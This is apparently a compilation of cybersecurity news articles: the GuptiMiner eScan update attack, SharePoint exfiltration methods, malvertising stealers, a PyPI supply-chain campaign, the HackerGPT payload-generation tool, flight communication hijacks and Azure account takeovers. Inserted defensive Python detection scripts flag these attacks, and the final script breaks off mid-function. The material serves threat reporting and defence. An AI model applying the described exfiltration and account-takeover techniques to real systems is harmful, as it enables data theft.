A malware campaign has been exploiting the updating mechanism of the eScan antivirus to distribute backdoors and cryptocurrency miners.
Avast researchers discovered and analyzed a malware campaign that exploited the update mechanism of the eScan antivirus to distribute backdoors and crypto miners.
Threat actors employed two different types of backdoors and targeted large corporate networks.
The researchers believe the campaign could be attributed to the North Korea-linked APT Kimsuky. The final payload distributed by GuptiMiner was also XMRig.
"GuptiMiner is a highly sophisticated threat that uses an interesting infection chain along with a couple of techniques that include performing DNS requests to the attacker's DNS servers, performing sideloading, extracting payloads from innocent-looking images, signing its payloads with a custom trusted root anchor certification authority, among others," reads the analysis published by Avast. "The main objective of GuptiMiner is to distribute backdoors within big corporate networks."
The threat actors behind this campaign exploited a vulnerability in the update mechanism of the Indian antivirus provider eScan that allowed them to carry out a man-in-the-middle attack to distribute the malware. Avast already reported the issue to eScan and the India CERT. eScan acknowledged the flaw and addressed it on July 31, 2023. The issue in the update mechanism was present for at least five years.
The infection process begins when eScan requests an update from the update server. However, the attackers carry out a MitM attack and replace the legitimate update package with a malicious one. Subsequently, eScan unpacks and installs the package, which results in the sideloading of a DLL by eScan's clean binaries. This DLL facilitates the continuation of the process, leading to the execution of multiple shellcodes and intermediary PE loaders.
The researchers noticed that the downloaded package file is replaced with a malware-laced one on the wire because the process doesn't use an HTTPS connection.
Below is the infection chain described by Avast:
The eScan updater triggers the update
The downloaded package file is replaced with a malicious one on the wire because of a missing HTTPS encryption (MitM is performed)
A malicious package updll62.dlz is downloaded and unpacked by eScan updater
The contents of the package contain a malicious DLL (usually called version.dll) that is sideloaded by eScan. Because of the sideloading, the DLL runs with the same privileges as the source process (eScan) and it is loaded the next time eScan runs, usually after a system restart
If a mutex is not present in the system (depends on the version, e.g. Mutex_ONLY_ME_V1), the malware searches for services.exe process and injects its next stage into the first one it can find
Cleanup is performed, removing the update package
GuptiMiner operates its own DNS servers to provide legitimate destination domain addresses of C2 servers through DNS TXT responses.
GuptiMiner connects directly to malicious DNS servers, bypassing the DNS network entirely. This use of the DNS protocol resembles telnet and is not considered DNS spoofing, which typically occurs within the DNS network. Although the servers requested by GuptiMiner exist, it's likely an evasion tactic.
In the second stage, the shellcode from the PNG file extracts and executes the Gzip loader. This loader is a simple PE that decompresses another shellcode using Gzip and executes it in a separate thread that loads the Stage 3 malware, Puppeteer.
Puppeteer orchestrates the core functionality of the malware, including the cryptocurrency mining as well as the backdoor deployment.
Surprisingly, the ultimate payload disseminated by GuptiMiner can be also XMRig, which was somewhat unexpected given the level of sophistication of this campaign.
The researchers speculate that using the miner could be a diversionary tactic.
"During our research, we've also found an information stealer which holds a rather similar PDB path as was used across the whole GuptiMiner campaign," concludes the report. "What is truly interesting, however, is that this information stealer might come from Kimsuky operations."
Security analysis of web applications is, first of all, a search and investigation of cases of incorrect functioning of program code and vulnerabilities. Those who choose a penetration tester's profession should keep in mind that it requires continuous learning and the ability to use a library of resources for self-education. A common situation is that while you are studying vulnerabilities in one framework, a dozen new reports are published. To quickly understand the potential vulnerabilities associated with previously unknown technologies, you need to be well-versed in the sources of information. When working in a team on an actual pentest project, there is usually no time for a thoughtful search. So, if your skills are combined with a strong foundational education, you are looking at promising career opportunities.
Your initial understanding of the subject can be developed through cybersecurity analysis courses at the university. These courses can also help you decide if this career path is right for you. It is good to receive foundational training in software development and networking, including web applications, while you are at university. Afterward, you can gain hands-on experience by practicing infrastructure penetration testing.
Usually, your initial attempts to secure a job as a web penetration tester might reveal gaps in your knowledge. Seeking employment at companies like VentureDive, where the work could help fill these educational gaps and offer valuable experience, is a smart approach. For instance, you could start as a technical support specialist in information security at a large company. After about two to four months, you might go for your first interview for a security analyst position, during which you could identify any weak points you might still have. With a few more months of work under the guidance of a mentor and diving into training materials, you could successfully land a position as a penetration tester.
Choosing where to work in the future is not as straightforward as it may appear. In a large, well-known company, you will be surrounded by a high level of expertise and likely assigned a mentor. However, the opportunity to find truly interesting vulnerabilities in real projects might be limited. This is because such organizations often have costly services, and their clients are usually not willing to skimp on development and security. Consequently, you will be working with quality products that have undergone thorough security testing, reducing the likelihood of encountering situations that provide valuable experience.
In a small company, you should not expect to find a mentor, a high level of expertise, or an impressive salary. However, these companies often get orders to pentest applications with many vulnerabilities, providing invaluable experience for those new to the profession. With this experience under your belt, you could eventually transition to a larger company.
Mastering Interview Techniques
Given that we cannot cover everything, let's go over the essential knowledge and skills you need to analyze vulnerabilities in web applications.
A pentester needs to understand how applications function on the network level, which includes knowing about TCP handshakes, domain names, IPs, proxies, etc. It is also important to grasp the basics of how HTTP and HTTPS protocols work. Being prepared to answer questions like "What is the difference between HTTP methods?", "When should PATCH be used as opposed to POST?" and "How do HTTP 0.9/1.1 differ from HTTP/2?" is a part of this foundational knowledge.
Vulnerabilities are not always tucked away in a web application's code; sometimes, they are embedded in its architecture, like within the web server itself. Often, a pentester might not have a direct view of the application's architecture but can infer how it functions. Therefore, having knowledge in this area is incredibly useful.
As vulnerabilities become more complex, it is important to grasp the basics. This foundational understanding allows you to tackle more complex issues as they arise.
Developing the ability to search for answers to your questions using open sources is vital, even if you have someone to ask. Always start by seeking out information and attempting to solve problems on your own before seeking help.
Being able to write and read code in various languages, including PHP, Python, JavaScript, Java, and C#, is essential. When it comes to analyzing web applications, you will encounter different approaches, such as white box, gray box, and black box testing. For example, if you are doing white box testing and have access to the application's source code, having development experience is a big plus. Additionally, the ability to write automation scripts and tailor third-party tools to fit your needs is a valuable skill.
Pentest projects frequently require examining the application from the outside in. You need the ability to scan the network and identify vulnerable services to ensure no obvious security flaws are overlooked.
In your work, you will often need to theoretically explain the nature of a vulnerability. This requires understanding basic concepts, such as how databases operate, the properties of information, and what constitutes vulnerability and exploitation. Essential skills also include system administration for both Windows and Linux.
Simply studying a vast number of vulnerabilities will not turn you into a top-tier professional, because it does not cultivate the skill of discovering them. During actual pentest projects, the toughest part is often identifying vulnerabilities. It is advised to search for vulnerable applications and analyze them without peeking at the technology stack or hints about the vulnerabilities. This practice offers foundational experience and insights into how things operate in an actual project.
For those lacking a basic education in security analysis, paid penetration testing courses are an option to consider. Unfortunately, the better courses tend to be expensive, and it is difficult to recommend any budget-friendly options that are truly effective. It is crucial to realize that these courses will not turn you into an expert overnight, as some might claim, but they will provide you with a solid understanding of the profession.
Two new techniques uncovered in SharePoint enable malicious actors to bypass traditional security measures and exfiltrate sensitive data without triggering standard detection mechanisms.
Illicit file downloads can be disguised as harmless activities, making it difficult for cybersecurity defenses to detect them. To accomplish this, the system's features are manipulated in various ways.
Security researchers from Varonis Threat Labs discovered two SharePoint techniques.
Open-In-App Method
The first technique, dubbed the "Open in App Method," takes advantage of the SharePoint feature that allows users to open documents directly in their associated applications.
While this feature is designed for user convenience, it has inadvertently created a loophole for data breaches.
Attackers can use this feature's underlying code to access and download files, leaving behind only an access event in the file's audit log.
This subtle footprint can easily be overlooked, as it does not resemble a typical download event.
The exploitation of this method can be carried out manually or automated through a PowerShell script.
When automated, the script can rapidly exfiltrate many files, significantly amplifying the potential damage.
The script leverages the SharePoint client object model (CSOM) to fetch files from the cloud and save them to a local computer, avoiding creating a download log entry.
SkyDriveSync User-Agent
The second technique involves the manipulation of the User-Agent string for Microsoft SkyDriveSync, now known as OneDrive, Varonis said.
By masquerading as the sync client, attackers can download files or even entire SharePoint sites.
These downloads are mislabeled as file synchronization events rather than actual downloads, thus slipping past security measures that are designed to detect and log file downloads.
This method is particularly insidious because it can be used to exfiltrate data on a massive scale, and the sync disguise makes it even harder for security tools to distinguish between legitimate and malicious activities.
The use of this technique suggests a sophisticated understanding of SharePoint and OneDrive's synchronization mechanisms, which could be exploited to systematically drain data from an organization without raising alarms.
Microsoft's Response And Security Patch Backlog
Upon discovery, Varonis researchers promptly reported these vulnerabilities to Microsoft in November 2023. Microsoft has acknowledged the issue and categorized these vulnerabilities as "moderate" security risks.
They have been added to Microsoft's patch backlog program, indicating that a fix is in the pipeline but may not be immediately available.
The discovery of these techniques underscores the risks associated with SharePoint and OneDrive, especially when permissions are misconfigured or overly permissive.
Organizations relying on these services for file sharing and collaboration must be vigilant and proactive in managing access rights to minimize the risk of unauthorized data access.
To combat these vulnerabilities, organizations are advised to implement additional detection strategies.
Monitoring for unusual patterns of access events, especially those that could indicate the use of the "Open in App Method," is crucial.
Similarly, keeping an eye on sync activities and verifying that they match expected user behavior can help identify misuse of the SkyDriveSync User-Agent technique.
Furthermore, organizations should prioritize the review and tightening of permissions across their SharePoint and OneDrive environments.
Regular audits and updates to security policies can help prevent threat actors from exploiting such vulnerabilities in the first place.
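A detection sketch for the two footprints the article describes, added here as an example (not Varonis' or Microsoft's code): it flags users who generate many file access events with no download event, and SkyDriveSync-tagged sync downloads that come from an endpoint outside the known sync baseline or arrive in bulk. The operation and field names (FileAccessed, FileDownloaded, FileSyncDownloadedFull, UserId, UserAgent, ClientIP, ObjectId, CreationTime) are assumed to follow the Microsoft 365 unified audit log schema; all events and the baseline are constructed.

```python
"""Detection sketch for the two SharePoint exfiltration footprints described
above: many FileAccessed events with no FileDownloaded (Open-in-App via CSOM)
and bulk FileSyncDownloadedFull events under a SkyDriveSync user agent from an
endpoint that has never synced before. Added example, not Varonis' or
Microsoft's code. Operation and field names follow the Microsoft 365 unified
audit log as the author understands it; treat them as assumptions and map them
to your own export. All events below are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

ACCESS_OP, DOWNLOAD_OP, SYNC_OP = "FileAccessed", "FileDownloaded", "FileSyncDownloadedFull"


def _parse_time(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")


def bulk_access_without_download(events, window=timedelta(minutes=5), threshold=20):
    """Return [(user, distinct_files)] for users who touch >= threshold distinct
    files through FileAccessed inside `window` while producing zero
    FileDownloaded events in that same window."""
    by_user = defaultdict(list)
    for e in events:
        if e["Operation"] in (ACCESS_OP, DOWNLOAD_OP):
            by_user[e["UserId"]].append((_parse_time(e["CreationTime"]), e))
    alerts = []
    for user, items in by_user.items():
        items.sort(key=lambda x: x[0])
        for i, (t0, _) in enumerate(items):
            seen, downloads = set(), 0
            for t, e in items[i:]:
                if t - t0 > window:
                    break
                if e["Operation"] == DOWNLOAD_OP:
                    downloads += 1
                else:
                    seen.add(e["ObjectId"])
            if downloads == 0 and len(seen) >= threshold:
                alerts.append((user, len(seen)))
                break  # one alert per user per run is enough
    return alerts


def unexpected_sync_sessions(events, known_sync_endpoints, threshold=50):
    """Return [((user, ip), reasons)] for SkyDriveSync-tagged full downloads
    whose (user, client IP) pair is not in the sync baseline, or that pull
    >= threshold distinct files. Either one is a sync client that does not
    match expected user behaviour."""
    per_pair = defaultdict(set)
    for e in events:
        if e["Operation"] == SYNC_OP and "SkyDriveSync" in e["UserAgent"]:
            per_pair[(e["UserId"], e["ClientIP"])].add(e["ObjectId"])
    alerts = []
    for pair, files in per_pair.items():
        reasons = []
        if pair not in known_sync_endpoints:
            reasons.append("unbaselined sync endpoint")
        if len(files) >= threshold:
            reasons.append(f"bulk sync of {len(files)} files")
        if reasons:
            alerts.append((pair, reasons))
    return alerts


# Constructed baseline: alice's laptop is the only known legitimate sync client.
KNOWN_SYNC_ENDPOINTS = {("alice@example.com", "203.0.113.10")}
SYNC_UA = "Microsoft SkyDriveSync 24.000.0000.0001 ship; Windows NT 10.0"  # constructed UA


def build_sample_events():
    """Constructed audit records: alice behaves normally, mallory shows both patterns."""
    base = datetime(2024, 4, 2, 9, 0, 0)
    site = "https://contoso.sharepoint.com/sites"

    def ev(offset_s, op, user, ua, obj, ip):
        return {"CreationTime": (base + timedelta(seconds=offset_s)).strftime("%Y-%m-%dT%H:%M:%S"),
                "Operation": op, "UserId": user, "UserAgent": ua, "ObjectId": obj, "ClientIP": ip}

    events = []
    # alice: opens three files, downloads one, and her laptop syncs five (benign).
    for i in range(3):
        events.append(ev(i * 30, ACCESS_OP, "alice@example.com", "Mozilla/5.0", f"{site}/fin/report{i}.xlsx", "203.0.113.10"))
    events.append(ev(90, DOWNLOAD_OP, "alice@example.com", "Mozilla/5.0", f"{site}/fin/report1.xlsx", "203.0.113.10"))
    for i in range(5):
        events.append(ev(120 + i, SYNC_OP, "alice@example.com", SYNC_UA, f"{site}/fin/synced{i}.docx", "203.0.113.10"))
    # mallory: 25 files accessed in 100 s with no download event (Open-in-App footprint) ...
    for i in range(25):
        events.append(ev(i * 4, ACCESS_OP, "mallory@example.com", "Mozilla/5.0", f"{site}/hr/file{i}.docx", "198.51.100.7"))
    # ... then 60 full sync downloads from an IP that has never synced (SkyDriveSync footprint).
    for i in range(60):
        events.append(ev(300 + i, SYNC_OP, "mallory@example.com", SYNC_UA, f"{site}/hr/doc{i}.pdf", "198.51.100.7"))
    return events


if __name__ == "__main__":
    sample = build_sample_events()
    print(bulk_access_without_download(sample))
    print(unexpected_sync_sessions(sample, KNOWN_SYNC_ENDPOINTS))
```

Thresholds and the sync baseline must be tuned per tenant; a shared service account that legitimately syncs whole libraries will otherwise trip the bulk rule.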
Hackers have been found hijacking Facebook pages to impersonate popular AI brands, thereby injecting malware into the devices of unsuspecting users.
This revelation comes from a detailed investigation by Bitdefender Labs, which has been closely monitoring these malicious campaigns since June 2023.
Recent analyses of malvertising campaigns have revealed a disturbing trend.
Ads are distributing an assortment of malicious software, which poses severe risks to consumers' devices, data, and identity.
Unwitting interactions with these malware-serving ads could lead to downloading and deploying harmful files, including Rilide Stealer, Vidar Stealer, IceRAT, and Nova Stealer, onto users' devices.
Rilide Stealer V4: A Closer Look
Bitdefender Labs has spotlighted an updated version of the Rilide Stealer (V4) lurking within sponsored ad campaigns that impersonate popular AI-based software and photo editors such as Sora, CapCut, Gemini AI, Photo Effects Pro, and CapCut Pro.
This malicious extension, targeting Chromium-based browsers, is designed to monitor browsing history, capture login credentials, and even facilitate the withdrawal of crypto funds by bypassing two-factor authentication through script injections.
Key Updates in Rilide V4:
Targeting of Facebook cookies
Masquerading as a Google Translate Extension
Enhanced obfuscation techniques to conceal the software's true intent
Indicators Of Compromise
Vidar Stealer: Evolving Threats
Vidar Stealer, another prolific info stealer, is marketed through the same MaaS model via dark web ads, forums, and Telegram groups.
Capable of exfiltrating personal information and crypto from compromised devices, Vidar's distribution has evolved from spam campaigns and cracked software to malicious Google Search ads and social media platforms, mainly through sponsored ads on Meta's platform.
Despite its name, IceRAT functions more as a backdoor on compromised devices. It acts as a gateway for secondary infections, such as crypto miners and information stealers that target login credentials and other sensitive data.
Nova Stealer emerges as a highly proficient info stealer with capabilities including password exfiltration, screen recordings, Discord injections, and crypto wallet hijacking.
Nova Stealer, offered as MaaS by the threat actor known as Sordeal, represents a significant threat to digital security.
Indicators Of Compromise
The Midjourney Saga: AI's Dark Side
The addition of AI tools on the internet, from free offerings and trials to subscription-based services, has not gone unnoticed by cybercriminals.
Midjourney, a leading generative AI tool with a user base exceeding 16 million as of November 2023, has become a favored tool among cyber gangs over the past year, highlighting the intersection of cutting-edge technology and cybercrime.
Indicators Of Compromise
159.89.120.191
159.89.98.241
As the digital landscape continues to evolve, so does the nature of the threats it harbors.
The rise of Malware-as-a-Service represents a significant shift in the cyber threat paradigm that requires vigilant and proactive measures to combat.
Over 170,000 users have fallen victim to a meticulously orchestrated scheme exploiting the Python software supply chain.
The Checkmarx Research team has uncovered a multi-faceted attack campaign that leverages fake Python infrastructure to distribute malware, compromising the security of countless developers and organizations.
This article delves into the attack campaign, its impact on victims, the tactics, techniques, and procedures (TTPs) employed by the threat actors, and the critical findings from Checkmarx's investigation.
Attack Campaign Description
The core of this malicious campaign revolves around an attacker's ability to combine several TTPs to launch a silent attack on the software supply chain, specifically targeting the Python ecosystem.
By creating multiple malicious open-source tools with enticing descriptions, the attackers lured victims into their trap, primarily through search engines.
The campaign's sophistication is evident in distributing a malicious dependency hosted on a fake Python infrastructure, which was then linked to popular projects on GitHub and legitimate Python packages.
A chilling account from Mohammed Dief, a Python developer and one of the campaignâs victims, highlights the stealth and impact of the attack.
Dief encountered a suspicious error message while working on his laptop, the first sign of the compromise, leading to the realization that his system had been hacked.
Victims And Impact
Among the notable victims of this campaign is the Top.gg GitHub organization, a community boasting over 170,000 members.
The attackers managed to hijack GitHub accounts with high reputations, including that of "editor-syntax," a maintainer with write permissions to Top.gg's repositories.
This allowed them to commit malicious acts and increase the visibility and credibility of their malicious repositories.
The attackâs impact is far-reaching, affecting individual developers and larger communities alike.
Social engineering schemes, account takeovers, and malicious packages published on the PyPI registry have underscored the software supply chain's vulnerability to such sophisticated attacks.
The Checkmarx Research team has uncovered an attack campaign aimed at the software supply chain.
The campaign appears to have successfully exploited multiple victims.
Threat Actors And TTPs
The threat actors behind this campaign demonstrated high sophistication and planning.
They employed a range of TTPs, including:
Account Takeover via Stolen Cookies: The attackers gained access to high-reputation GitHub accounts by stealing session cookies, bypassing the need for passwords.
Publishing Malicious Packages: By setting up a custom Python mirror and publishing malicious packages to the PyPI registry, they could distribute malware under the guise of legitimate software.
Social Engineering: The attackers used social engineering to trick users into downloading malicious dependencies, further spreading the malware.
By deploying a fake Python package mirror and utilizing typosquatting techniques, the attackers could deceive users and systems into downloading poisoned versions of popular packages like "Colorama."
The malicious payload delivered through these packages is designed to harvest sensitive information, including passwords, credentials, and data from various software applications.
The malware targets web browsers, Discord, cryptocurrency wallets, and Telegram, and even includes a keylogging component to capture victims' keystrokes.
The final stage of the malware reveals its data-stealing capabilities, targeting not only personal and financial information but also attempting to gain unauthorized access to victims' social media and communication platforms.
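A pre-install check for the two TTPs just described, added here as an example and not part of the Checkmarx report: it audits a requirements file for index URLs that point anywhere other than PyPI and for package names that sit one edit away from a watchlisted popular package such as colorama. The watchlist, the sample requirements and the mirror hostname are constructed.

```python
"""Pre-install audit of a requirements file for the two TTPs described above:
a dependency index pointed at a mirror other than PyPI and package names one
edit away from a popular package (typosquatting). Added example, not
Checkmarx's code. The watchlist and the sample requirements, including the
mirror hostname, are constructed."""
import re
from urllib.parse import urlparse

TRUSTED_INDEX_HOSTS = {"pypi.org", "files.pythonhosted.org"}
# Constructed watchlist; in practice seed it from your lockfiles or top PyPI downloads.
POPULAR_PACKAGES = {"colorama", "requests", "urllib3", "numpy", "setuptools"}


def normalize(name):
    """PEP 503 normalization: case-fold and collapse runs of -, _ and . into -."""
    return re.sub(r"[-_.]+", "-", name).lower()


def edit_distance(a, b):
    """Levenshtein distance (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def audit_requirements(text, max_distance=1):
    """Return (line_no, finding, detail) tuples for index URLs outside PyPI and
    for names within `max_distance` edits of a watchlisted package (but not equal)."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop trailing comments
        if not line:
            continue
        m = re.match(r"--(?:extra-)?index-url\s+(\S+)", line)
        if m:
            host = (urlparse(m.group(1)).hostname or "").lower()
            if host not in TRUSTED_INDEX_HOSTS:
                findings.append((line_no, "untrusted-index", host))
            continue
        if line.startswith("-"):  # other pip options (-r, --hash, ...) are out of scope here
            continue
        # Strip version specifiers, extras, markers and direct references to get the name.
        name = normalize(re.split(r"[<>=!~\[;\s@]", line, maxsplit=1)[0])
        if name in POPULAR_PACKAGES:
            continue
        for popular in sorted(POPULAR_PACKAGES):
            if edit_distance(name, popular) <= max_distance:
                findings.append((line_no, "possible-typosquat", f"{name} ~ {popular}"))
                break
    return findings


# Constructed sample: one fake mirror line and two look-alike names beside the real ones.
SAMPLE_REQUIREMENTS = """\
--extra-index-url https://files.pypi-mirror.example/simple  # constructed fake mirror
colorama==0.4.6
colorsama==0.4.6        # constructed: one insertion away from colorama
requests>=2.31
requets                 # constructed: one deletion away from requests
numpy
"""

if __name__ == "__main__":
    for finding in audit_requirements(SAMPLE_REQUIREMENTS):
        print(finding)
```

Run it in CI before `pip install`; a finding on an index URL is a hard failure, while a typosquat finding is a prompt to confirm the intended package name.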
This attack campaign highlights the critical vulnerabilities within the software supply chain, particularly in open-source ecosystems like Python's.
The sophistication and success of the attackers in exploiting these vulnerabilities underscore the need for heightened vigilance and robust security practices among developers and organizations.
Through continuous monitoring, collaboration, and information sharing, the cybersecurity community can mitigate risks and protect the integrity of open-source software.
HackerGPT is a cutting-edge AI tool designed explicitly for the cybersecurity sector, particularly beneficial for individuals involved in ethical hacking, such as bug bounty hunters.
This advanced assistant is at the cutting edge of cyber intelligence, offering a vast repository of hacking methods, tools, and tactics. More than a mere repository of information, HackerGPT actively engages with users, aiding them through the complexities of cybersecurity.
There are several ChatGPT-powered tools, such as OSINVGPT, PentestGPT, WormGPT, and BurpGPT, that have already been developed for the cyber security community, and HackerGPT is writing a new chapter for the same.
What is the Purpose of HackerGPT:
It leverages the capabilities of ChatGPT, enhanced with specialized training data, to assist in various cybersecurity tasks, including network and mobile hacking, and understand different hacking tactics without resorting to unethical practices like jailbreaking.
HackerGPT generates responses to user queries in real-time, adhering to ethical guidelines. It supports both GPT-3 and GPT-4 models, providing users with access to a wide range of hacking techniques and methodologies.
The tool is available for use via a web browser, with plans to develop an app version in the future. It offers a 14-day trial with unlimited messages and faster response times.
HackerGPT aims to streamline the hacking process, making it significantly easier for cybersecurity professionals to generate payloads, understand attack vectors, and communicate complex technical results effectively.
This AI-powered assistant is seen as a valuable resource for enhancing security evaluations and facilitating the understanding of potential risks and countermeasures among both technical and non-technical stakeholders.
Recently, HackerGPT released 2.0, and the beta is now available here.
Upon posing a query to HackerGPT, the process begins with authentication of the user and management of query allowances, which differ for free and premium users.
The system then probes its extensive database to find the most relevant information to the query. For non-English inquiries, translation is employed to ensure the database search is effective.
If a suitable match is discovered, it is integrated into the AI's response mechanism. The query is securely transmitted to OpenAI or OpenRouter for processing, ensuring no personal data is included. The response you receive depends on the module in use:
HackerGPT Module: A customized version of Mixtral 8x7B with semantic search capabilities tailored to our database.
GPT-4 Turbo: The most recent innovation from OpenAI, enhanced with our specialized prompts.
Guidelines for Issues: The "Issues" section is strictly for problems directly related to the codebase. We've noticed an influx of non-codebase-related issues, such as feature requests or cloud provider problems. Please consult the "Help" section under the "Discussions" tab for setup-related queries. Issues not pertinent to the codebase are typically closed promptly.
Engagement in Discussions: We strongly encourage active participation in the "Discussions" tab! It's an excellent platform for asking questions, exchanging ideas, and seeking assistance. If you have a question, chances are others have the same one.
Updating Process: To update your local Chatbot UI repository, navigate to the root directory in your terminal and execute:
npm run update
For hosted instances, you'll also need to run:
npm run db-push
This will apply the latest migrations to your live database.
Setting Up Locally: To set up your own instance of Chatbot UI locally, follow these steps:
Navigate to the root directory of your local Chatbot UI repository and run:
npm install
Install Supabase & Run Locally:
Supabase is chosen for its ease of use, open-source nature, and free tier for hosted instances. It replaces local browser storage, addressing security concerns, storage limitations, and enabling multi-modal use cases.
Install Docker: Necessary for running Supabase locally. Download it for free from the official site.
Install Supabase CLI: Use Homebrew for macOS/Linux or Scoop for Windows.
Start Supabase: Execute supabase start in your terminal at the root of the Chatbot UI repository.
Fill in Secrets: Copy the .env.local.example file to .env.local and populate it with values obtained from supabase status.
Optional Local Model Installation:
For local models, follow the instructions provided for Ollama installation.
Run the App Locally:
Finally, run npm run chat in your terminal. Your local instance should now be accessible at http://localhost:3000.
Setting Up a Hosted Instance:
To deploy your Chatbot UI instance in the cloud, follow the local setup steps here. Then, create a separate repository for your hosted instance and push your code to GitHub.
Set up the backend with Supabase by creating a new project and configuring authentication. Connect to the hosted database and configure the frontend with Vercel, adding necessary environment variables. Deploy, and your hosted Chatbot UI instance should be live and accessible through the Vercel-provided URL. You can read the complete GitHub repository here.
Two flights bound for Israel over the past week have suffered attempts to hijack their communications and divert the aircraft, according to local reports.
The El Al flights were both travelling from Thailand to Israel’s Ben Gurion international airport and apparently encountered “hostile elements” while flying over the Middle East.
Citing a report from national broadcaster Kan Reshet B, The Jerusalem Post claimed that hackers attempted to hijack the planes’ communications networks in order to divert them from their pre-programmed route.
No group has claimed responsibility. Although the aircraft were flying over an area in which Iranian-backed Houthis are active, sources have claimed it could be the work of a group operating from Somaliland, an unrecognized state in the Horn of Africa.
Fortunately, the pilots reportedly became suspicious about the sudden change in instructions and ignored them, switching to another communications channel and double-checking their route with air traffic controllers.
An El Al source revealed that pilots are trained to spot and mitigate such threats whilst in the air.
“The disruption did not affect the normal course of the flight thanks to the professionalism of the pilots who used the alternative means of communication and allowed the flight to continue on the planned route.”
The EU’s aviation safety agency EASA recently revamped its cybersecurity regulations for the sector with the release of the first Easy Access Rules (EAR) for Information Security (Part IS).
They’re designed to enforce best practice security across the industry, covering an exhaustive range of suppliers as well as airlines, airports, communication infrastructure providers and air towers.
An ongoing campaign of cloud account takeover has affected hundreds of user accounts, including those of senior executives, and impacted dozens of Microsoft Azure environments.
Threat actors attack users with customized phishing lures inside shared documents as part of this ongoing effort.
Some documents that have been weaponized have embedded links to “View document,” which, when clicked, take users to a malicious phishing webpage to steal sensitive information and commit financial fraud.
Attackers Targeting Wide Range Of Individuals
Threat actors appear to target a broad spectrum of people with varying titles from various organizations, affecting hundreds of users worldwide.
“The affected user base encompasses a wide spectrum of positions, with frequent targets including Sales Directors, Account Managers, and Finance Managers,” Proofpoint researchers shared with Cyber Security News.
“Individuals holding executive positions such as ‘Vice President, Operations,’ ‘Chief Financial Officer & Treasurer’ and ‘President & CEO’ were also among those targeted.”
Threat actors take a pragmatic approach, as the variety of targeted positions shows: they aim to compromise accounts with varying degrees of access to important resources and responsibilities across organizational functions.
In this campaign, researchers observed the usage of a particular Linux user agent that attackers employed during the attack chain’s access phase.
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
The “OfficeHome” sign-in application is primarily accessed by attackers using this user agent, along with other native Microsoft 365 apps, like:
“Office365 Shell WCSS-Client” (indicative of browser access to Office365 applications)
“Office 365 Exchange Online” (indicative of post-compromise mailbox abuse, data exfiltration, and email threats proliferation)
“My Signins” (used by attackers for MFA manipulation; for more info about this technique, see our recent Cybersecurity Stop of the Month blog)
“My Apps”
“My Profile”
Attackers register their own MFA methods to maintain persistent access, choosing authentication options such as additional phone numbers for SMS or voice-call verification.
Criminals get access to and download confidential data such as user credentials, internal security protocols, and financial assets.
Mailbox access is also used to target individual user accounts with phishing threats and migrate laterally across compromised organizations.
Internal emails are sent to the impacted companies’ finance and human resources departments to commit financial fraud.
Attackers design specialized obfuscation rules to hide their activities and erase any proof of malicious activity from the inboxes of their victims.
“Attackers were observed employing proxy services to align the apparent geographical origin of unauthorized activities with that of targeted victims, evading geo-fencing policies,” researchers said.
In your own cloud environment, therefore, watch for account takeover (ATO) and unauthorized access to key resources. Security solutions must identify both the initial account compromise and post-compromise actions precisely and promptly, together with insight into the services and applications that have been misused.
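As an added example (not code from the Proofpoint report), the following Python applies the indicators above to constructed, simplified sign-in and audit records: it flags the quoted Linux user agent against the listed first-party apps and correlates a follow-on MFA method registration, the persistence step described above. Field names, users, IPs and timestamps are constructed placeholders, not the Entra ID log schema.

```python
"""Detection sketch for the access pattern described above.

Added example, not code from the Proofpoint report. Records are constructed and
simplified; real Microsoft Entra ID sign-in and audit logs use other field names.
"""
from datetime import datetime, timedelta

# User agent and first-party application names quoted in the report.
SUSPECT_UA = ("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36")
WATCHED_APPS = {
    "OfficeHome",
    "Office365 Shell WCSS-Client",
    "Office 365 Exchange Online",
    "My Signins",
    "My Apps",
    "My Profile",
}

# Constructed sign-in events (hypothetical users, RFC 5737 test IPs).
SIGNINS = [
    {"ts": "2024-02-05T08:01:10Z", "user": "cfo@example.test",
     "app": "OfficeHome", "ua": SUSPECT_UA, "ip": "203.0.113.7"},
    {"ts": "2024-02-05T08:02:30Z", "user": "cfo@example.test",
     "app": "My Signins", "ua": SUSPECT_UA, "ip": "203.0.113.7"},
    {"ts": "2024-02-05T08:09:00Z", "user": "cfo@example.test",
     "app": "Office 365 Exchange Online", "ua": SUSPECT_UA, "ip": "203.0.113.7"},
    # Legitimate Windows user on the same app: must not be flagged.
    {"ts": "2024-02-05T08:15:00Z", "user": "sales@example.test",
     "app": "OfficeHome", "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Edg/121.0",
     "ip": "198.51.100.4"},
]

# Constructed audit events: the "security info" (MFA method) changes the report
# ties to attacker use of "My Signins".
AUDIT = [
    {"ts": "2024-02-05T08:03:15Z", "user": "cfo@example.test",
     "activity": "User registered security info", "detail": "Phone (SMS) +1 555 0100"},
    {"ts": "2024-02-05T13:00:00Z", "user": "sales@example.test",
     "activity": "User registered security info", "detail": "Authenticator app"},
]


def _parse_ts(ts):
    """ISO-8601 with a trailing Z; the replace keeps Python < 3.11 happy."""
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def is_suspect(event):
    """Exact UA match against the watched apps. Exact on purpose: the report quotes
    one fixed string, and a looser match would flag every legitimate Linux desktop."""
    return event["ua"] == SUSPECT_UA and event["app"] in WATCHED_APPS


def suspect_signins(events):
    return [e for e in events if is_suspect(e)]


def mfa_changes_after(user, start, audit, window=timedelta(hours=1)):
    """Security-info changes by `user` inside `window` after a suspect sign-in."""
    end = start + window
    return [a for a in audit
            if a["user"] == user and start <= _parse_ts(a["ts"]) <= end]


def summarize(events, audit):
    """Per-user view: apps touched, source IPs and any follow-on MFA registrations."""
    report = {}
    for e in sorted(suspect_signins(events), key=lambda e: e["ts"]):
        entry = report.setdefault(e["user"], {"first_seen": e["ts"], "apps": set(),
                                              "ips": set(), "mfa_changes": []})
        entry["apps"].add(e["app"])
        entry["ips"].add(e["ip"])
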